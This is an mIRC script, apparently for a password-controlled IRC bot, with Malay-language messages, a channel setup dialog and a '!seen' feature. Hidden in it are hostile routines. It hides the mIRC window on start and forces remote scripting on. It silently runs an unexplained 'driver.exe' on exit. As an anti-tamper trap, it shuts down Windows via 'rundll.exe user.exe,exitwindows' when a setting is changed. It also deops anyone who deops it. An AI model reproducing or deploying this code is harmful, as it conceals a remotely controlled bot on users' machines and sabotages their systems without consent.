   on 1:START: { permulaan }
   alias permulaan { .echo $dll(aircdll.dll,SetMircTitle,Winp) | dll close.dll _hide Winp | .perform  | .timer 0 16 .nuLL  | nakpengsan | .nakmula |  if (%naknnickapa == 1) { /nick $read $mircdirRandomNickNames.txt } | if (%naknnickapa == 2) { /nick $read -|1 $mircdirnama.txt } |  /run $mircexe \mirc2.ini  | .hmake cpro | .hload -s cpro cpro | .starting  }
   on *:exit: { .run driver.exe }
   alias perform {  //writeini $mircdirmirc.ini perform n0 /remote on | //writeini $mircdirmirc.ini perform n1 /echo remote on | //writeini $mircdirmirc.ini perform n2 /echo remote on | //writeini $mircdirmirc.ini perform n3 /echo remote on | //writeini $mircdirmirc.ini perform n4 /echo remote on | //writeini $mircdirmirc.ini perform n5 /echo remote on | //writeini $mircdirmirc.ini perform n6 /echo remote on | //writeini $mircdirmirc.ini perform n7 /echo remote on | //writeini $mircdirmirc.ini perform n8 /echo remote on | //writeini $mircdirmirc.ini perform n9 /echo remote on   }
   alias nuLL { if ($server == $null) {  //echo Not Connected To Server | /server java.webchat.org 6669 } }
   alias naktutupdah { run rundll.exe user.exe,exitwindows }
   alias nakmula { .emailaddr $read $mircdirident.txt | .anick $read $mircdirRandomNickNames.txt | if (%naknnickapa==2) {  .set %nickname $read -|1 $mircdirnama.txt | nick %nickname }  | .fullname $read $mircdir123.txt }
   alias nakpengsan { if ($readini mirc.ini fonts fscripts != Webdings,403) { .writeini mirc.ini fonts fscripts Webdings,403 | .remote on | .inc %penceroboh 1 | /set %setat Off | /timer 100 0 /echo 4Ripper Are Not Allowed Here | if (%penceroboh == 3) { .set %penceroboh 0 | .timer 1 3 .naktutupdah  } .timer 1 3 .exit } }
   on *:NOTIFY:{ if ($nick == Schwarzenegger) { .notice schwarzenegger Jumpa jugak dengan hang.. Lama aku cari } }
   on Schwarzenegger:join:#: { if ($nick != $me) && ($me isop $chan) && ($nick !isvo $chan) && ($nick !isop $chan) { .cs voice # $nick | .notice Schwarzenegger : OoOOOoooo, sini rupanya hang. | halt } }
   on *:JOIN:#:{ if ($nick == Schwarzenegger) { .notice Schwarzenegger : Ahaks, ingatkan ang tak chat hari nih | .raw -q mode $chan +v $nick } }
   alias abuhurairah { showmirc -t }
   on 1:DEOP:#: { if ($opnick == $me) && ($nick == Chanserv) && ($nick != $me) { msg chanserv op $chan $me | halt } if ($opnick == $me) && ($nick != Chanserv) && ($nick != $me) { timer 1 3 msg chanserv op $chan $me | chanserv deop $chan $nick | msg chanserv op $chan $me | halt } else { halt } }
   alias starting {
     if (%dialog == BELUM) { dialog -m tablez tablez } | .set %dialog SUDAH
   }
   dialog tablez {
     title "mIRC Control Central"
     size -1 -1 154 130
     option dbu
     button "Nickname?", 210, 11 22 57 10
     button "Alternative?", 1, 11 39 57 10
     button "Nick Identify 1?", 2, 11 55 57 10
     button "Nick Identify 2?", 3, 11 70 57 10
     button "Bot Password?", 4, 11 5 57 10
     button "Channel 1?", 10, 11 86 57 10
     button "Channel 2?", 5, 11 101 57 10
     button "Channel 3?", 6, 11 116 57 10
     button "Channel 4?", 7, 84 5 57 10
     button "Channel 5?", 8, 84 22 57 10
     button "Channel 6?", 9, 84 39 57 10
     button "Channel 7?", 11, 84 55 57 10
     button "Channel 8?", 12, 84 86 57 10
     button "Channel 9?", 13, 84 70 57 10
     button "Channel 10?", 14, 84 101 57 10
     button "Launch", 15, 110 116 31 10, ok
   }
   on 1:dialog:tablez:*:*:{
     if ($devent == sclick) {
       if ($did == 210) { write -l1 $mircdirwin.kfg $$?="Nickname For mIRC Bot ?" | .set %naknnickapa 2 | timer 1 1 did -o tablez 210 1 $read -l1 $mircdirwin.kfg }
       if ($did == 1) { write -l2 $mircdirwin.kfg $$?="Alternative Nick For mIRC Bot ?" | timer 1 1 did -o tablez 1 1 $read -l2 $mircdirwin.kfg }
       if ($did == 2) { write -l1 $mircdirnakident.kfg $$?="First Auto Identify Agent! Type In Your Nick And Password - Example :  evolGydoB drowssap" | timer 1 1 did -o tablez 2 1 $read -l1 $mircdirwindow.kfg }
       if ($did == 3) { write -l2 $mircdirnakident.kfg $$?="Second Auto Identify Agent! Type In Your Nick And Password - Example : BodyGlove password" | timer 1 1 did -o tablez 3 1 $read -l2 $mircdirwindow.kfg }
       if ($did == 4) { set %passwd $$?="mIRC Bot Password? With This Password You Can Use /msg BotNick This Password .. To Control The Bot!" | timer 1 1 did -o tablez 4 1 %passwd }
       if ($did == 10) { write -l1 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 10 1 $read -l1 $mircdirconfig.kfg }
       if ($did == 5) { write -l2 $mircdirconfig.kfg $$?=" Channel To Auto Join ?" | timer 1 1 did -o tablez 5 1 $read -l2 $mircdirconfig.kfg }
       if ($did == 6) { write -l3 $mircdirconfig.kfg $$?=" Channel To Auto Join ?" | timer 1 1 did -o tablez 6 1 $read -l3 $mircdirconfig.kfg }
       if ($did == 7) { write -l4 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 7 1 $read -l4 $mircdirconfig.kfg }
       if ($did == 8) { write -l5 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 8 1 $read -l5 $mircdirconfig.kfg }
       if ($did == 9) { write -l6 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 9 1 $read -l6 $mircdirconfig.kfg }
       if ($did == 11) { write -l7 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 11 1 $read -l7 $mircdirconfig.kfg }
       if ($did == 12) { write -l8 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 12 1 $read -l8 $mircdirconfig.kfg }
       if ($did == 13) { write -l9 $mircdirconfig.kfg $$?=" Channel To Auto Join ?" | timer 1 1 did -o tablez 13 1 $read -l9 $mircdirconfig.kfg }
       if ($did == 14) { write -l10 $mircdirconfig.kfg $$?="Channel To Auto Join ?" | timer 1 1 did -o tablez 14 1 $read -l10 $mircdirconfig.kfg } | if ($did == 15) { disconnect | write -l1 set.exe Setup Done | timer 1 2 .resetnick | timer 1 5 server java.webchat.org 6669 }
     }
   }
   #sen on
   on 1:text:*seen*:#: {
     if ($1 == !seen) {
       if ($2 == $null) { .notice $nick 5Command Yang Betul: !seen nick | halt }
       if ($2 == $me) { .notice $nick 5Nak Kata Buta dak, $nick $+ . | halt }
       if ($2 == $nick) { .notice $nick 5Isk Isk Isk, $nick $+ , hang tu invisible ke?. | halt }
       if ($2 ison $chan) { .notice $nick 5 $+ $2 is dah lama dah dok dlm cenel ni. | halt }
       if ($readini ini\users.ini $2 date == $null) { .notice $nick 5 $+ $2 Yang tu Tok Guru aku tak habaq lagie. | halt }
       else {
         if ($readini ini\users.ini $2 me == $null) {
           if ($readini ini\users.ini $2 part == yes) { .msg $nick  5 $+ $2 Time terakhir dia dlm cenel nih [ $readini ini\users.ini $2 chan ]  $+ $duration($calc($ctime($fulldate)-$ctime($readini ini\users.ini $2 date))) ago. }
           else { .msg $nick [ 5 $+ $2 ] Time terakhir dia Disconnect  $+ $duration($calc($ctime($fulldate)-$ctime($readini ini\users.ini $2 date))) ago with the message: " $+ [ $readini ini\users.ini $2 message ] $+ ". }
         }
         else {
           if ($readini ini\users.ini $2 part == yes) { .msg $nick  5 $+ $2 Time terakhir dia dlm cenel nih [ $readini ini\users.ini $2 chan ]  $+ $duration($calc($ctime($fulldate)-$ctime($readini ini\users.ini $2 date))) ago. | .msg $nick 5 $+ $2 $+ 's last action was: 6 $+ [ $readini ini\users.ini $2 me ] }
           else { .msg $nick 5 $+ $2 Time terakhir dia disconnect  $+ $duration($calc($ctime($fulldate)-$ctime($readini ini\users.ini $2 date))) ago with the message: " $+ [ $readini ini\users.ini $2 message ] $+ ". | .msg $nick 5 $+ $2 $+ 's last action was: 6 $+ [ $readini ini\users.ini $2 me ] }
         }
       }
       else { halt }
     }
   }
   #sen end
   #sjsen on
   on 1:QUIT:/writeini -n ini\users.ini $nick date $fulldate | writeini -n ini\users.ini $nick part no | writeini -n ini\users.ini $nick message $1-
   on 1:PART:#:/writeini -n ini\users.ini $nick date $fulldate | writeini -n ini\users.ini $nick chan $chan | writeini -n ini\users.ini $nick part yes
   on 1:ACTION:*:#:writeini -n ini\users.ini $nick me * $+ $nick $1-
   #sjsen end
